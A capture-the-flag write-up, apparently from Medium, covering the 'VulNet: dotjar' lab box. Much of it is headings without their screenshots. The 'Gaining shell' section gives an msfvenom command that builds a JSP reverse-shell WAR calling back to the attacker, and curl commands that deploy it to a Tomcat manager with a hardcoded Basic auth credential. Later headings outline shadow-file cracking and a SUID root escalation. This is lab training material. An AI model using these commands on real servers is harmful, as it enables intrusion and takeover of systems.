VulNet: dotjar

Scanning the box and Initial recon

Result of the aggressive port scanning

Exploiting the vulnerability

Credentials and exploits from the ghostcat exploit

Gaining shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your tun0 IP> LPORT=4444 -f war -o reverse.war`.
curl --upload-file reverse.war --header "Authorization: Basic d2ViZGV2OkhnajNMQSQwMkQkRmFAMjE=" "http://10.10.23.194:8080/manager/text/deploy?path=/reverse"
curl --header "Authorization: Basic d2ViZGV2OkhnajNMQSQwMkQkRmFAMjE=" http://10.10.23.194:8080/manager/text/list

Horizontal Privilege Escalation and User flag

Spawning the initial shell on the target
Hidden backup found by LinPEAS
Leaked backup of /etc/shadow file
Recovering the password using hashcat
Horizontal escalation to the jdk-admin user

Gaining root access using Java

Root reverse shell

Changing shell’s permission

Running the SUID exploit code and checking if ran successfully or not
Running the SUID enabled bash executable to elevate permissions to root

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store